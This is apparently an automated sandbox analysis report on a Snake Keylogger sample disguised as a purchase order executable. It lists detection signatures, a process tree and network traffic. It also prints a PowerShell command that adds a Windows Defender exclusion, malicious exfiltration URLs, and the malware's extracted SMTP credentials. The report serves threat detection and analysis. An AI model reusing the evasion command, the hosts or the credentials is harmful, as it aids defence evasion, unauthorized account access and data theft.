Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ORDEM DE COMPRA.exe

Overview

General Information

Sample name:ORDEM DE COMPRA.exe
Analysis ID:1446502
MD5:46dab257847ea9cfbbc77979323212c4
SHA1:8cbd33b3cf519807b2c986f7fbe3daae4175595f
SHA256:1f522609abaf12c6647c56b379cdf2c9263a845a6b4c93bac7111d0c27d68159
Tags:exe
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Disables UAC (registry)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ORDEM DE COMPRA.exe (PID: 1756 cmdline: "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" MD5: 46DAB257847EA9CFBBC77979323212C4)
    • powershell.exe (PID: 6084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 356 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • AddInProcess32.exe (PID: 6976 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • AddInProcess32.exe (PID: 4508 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • WerFault.exe (PID: 2732 cmdline: C:\Windows\system32\WerFault.exe -u -p 1756 -s 1120 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "divine4040@gbogboro.com", "Password": "Egoamaka@123", "Host": "mail.gbogboro.com", "Port": "587"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x148fe:$a1: get_encryptedPassword
        • 0x14bf4:$a2: get_encryptedUsername
        • 0x1470a:$a3: get_timePasswordChanged
        • 0x14805:$a4: get_passwordField
        • 0x14914:$a5: set_encryptedPassword
        • 0x15f1b:$a7: get_logins
        • 0x15e7e:$a10: KeyLoggerEventArgs
        • 0x15b17:$a11: KeyLoggerEventArgsEventHandler
        00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
        • 0x18244:$x1: $%SMTPDV$
        • 0x182a8:$x2: $#TheHashHere%&
        • 0x198c3:$x3: %FTPDV$
        • 0x199ad:$x4: $%TelegramDv$
        • 0x15b17:$x5: KeyLoggerEventArgs
        • 0x15e7e:$x5: KeyLoggerEventArgs
        • 0x198e7:$m2: Clipboard Logs ID
        • 0x19aa9:$m2: Screenshot Logs ID
        • 0x19b75:$m2: keystroke Logs ID
        • 0x19a81:$m4: \SnakeKeylogger\
        Click to see the 16 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          5.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            5.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
              5.2.AddInProcess32.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x14afe:$a1: get_encryptedPassword
              • 0x14df4:$a2: get_encryptedUsername
              • 0x1490a:$a3: get_timePasswordChanged
              • 0x14a05:$a4: get_passwordField
              • 0x14b14:$a5: set_encryptedPassword
              • 0x1611b:$a7: get_logins
              • 0x1607e:$a10: KeyLoggerEventArgs
              • 0x15d17:$a11: KeyLoggerEventArgsEventHandler
              5.2.AddInProcess32.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x1c3cb:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x1b5fd:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x1ba30:$a4: \Orbitum\User Data\Default\Login Data
              • 0x1ca6f:$a5: \Kometa\User Data\Default\Login Data
              Click to see the 28 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDEM DE COMPRA.exe", ParentImage: C:\Users\user\Desktop\ORDEM DE COMPRA.exe, ParentProcessId: 1756, ParentProcessName: ORDEM DE COMPRA.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force, ProcessId: 6084, ProcessName: powershell.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDEM DE COMPRA.exe", ParentImage: C:\Users\user\Desktop\ORDEM DE COMPRA.exe, ParentProcessId: 1756, ParentProcessName: ORDEM DE COMPRA.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force, ProcessId: 6084, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDEM DE COMPRA.exe", ParentImage: C:\Users\user\Desktop\ORDEM DE COMPRA.exe, ParentProcessId: 1756, ParentProcessName: ORDEM DE COMPRA.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force, ProcessId: 6084, ProcessName: powershell.exe

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://scratchdreams.tkAvira URL Cloud: Label: malware
              Source: https://scratchdreams.tk/_send_.php?TSAvira URL Cloud: Label: malware
              Source: http://scratchdreams.tkAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "divine4040@gbogboro.com", "Password": "Egoamaka@123", "Host": "mail.gbogboro.com", "Port": "587"}
              Multi AV Scanner detection for domain / URL
              Source: scratchdreams.tkVirustotal: Detection: 18%Perma Link
              Source: https://scratchdreams.tk/_send_.php?TSVirustotal: Detection: 16%Perma Link
              Source: http://scratchdreams.tkVirustotal: Detection: 18%Perma Link
              Source: https://scratchdreams.tkVirustotal: Detection: 17%Perma Link
              Multi AV Scanner detection for submitted file
              Source: ORDEM DE COMPRA.exeVirustotal: Detection: 25%Perma Link
              Source: ORDEM DE COMPRA.exeReversingLabs: Detection: 21%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
              Machine Learning detection for sample
              Source: ORDEM DE COMPRA.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Tries to detect the country of the analysis system (by using the IP)
              Source: unknownDNS query: name: reallyfreegeoip.org

              Exploits

              barindex
              Yara detected UAC Bypass using CMSTP
              Source: Yara matchFile source: 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ORDEM DE COMPRA.exe PID: 1756, type: MEMORYSTR
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49700 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49722 version: TLS 1.2
              Source: ORDEM DE COMPRA.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: System.Windows.Forms.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: mscorlib.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.ni.pdbRSDS source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: Microsoft.CSharp.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Dynamic.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Windows.Forms.pdb0 source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Windows.Forms.ni.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Drawing.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: mscorlib.ni.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Drawing.ni.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Core.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Drawing.pdb` source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Drawing.ni.pdbRSDS source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.pdbMZ source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.ni.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: System.Core.ni.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WERE5FE.tmp.dmp.9.dr
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_02F6F21B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_02F6F03B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 02F6F7A1h5_2_02F6F4E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_02F6EA08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 02F6FBF9h5_2_02F6F941
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A60F11h5_2_06A60C60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A62091h5_2_06A61DE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A62658h5_2_06A62240
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A6021Dh5_2_06A60040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A60BA7h5_2_06A60040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A6D969h5_2_06A6D6C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A6D0B9h5_2_06A6CE10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A6E219h5_2_06A6DF70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A6EF21h5_2_06A6EC78
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A62658h5_2_06A62586
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A617D1h5_2_06A61520
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A6F7D1h5_2_06A6F528
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A6C809h5_2_06A6C560
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A6D511h5_2_06A6D268
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A6E671h5_2_06A6E3C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A6DDC1h5_2_06A6DB18
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A61371h5_2_06A610C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A6F379h5_2_06A6F0D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A6EAC9h5_2_06A6E820
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A6CC61h5_2_06A6C9B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A61C31h5_2_06A61980
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A6FC29h5_2_06A6F980
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A6C3B1h5_2_06A6C108
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A78D95h5_2_06A78A58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A76169h5_2_06A75EC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A788A9h5_2_06A78600
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A75D11h5_2_06A75A68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_06A737FA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A76E71h5_2_06A76BC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A765C1h5_2_06A76318
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A76A19h5_2_06A76770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A7774Ah5_2_06A774A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A70741h5_2_06A70498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A70B99h5_2_06A708F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A77BA1h5_2_06A778F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A772C9h5_2_06A77020
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_06A73808
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A702E9h5_2_06A70040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A71449h5_2_06A711A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A78451h5_2_06A781A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A75891h5_2_06A755E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A70FF1h5_2_06A70D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 06A77FF9h5_2_06A77D50

              Networking

              barindex
              Yara detected Generic Downloader
              Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPE
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49700 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: scratchdreams.tk
              Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
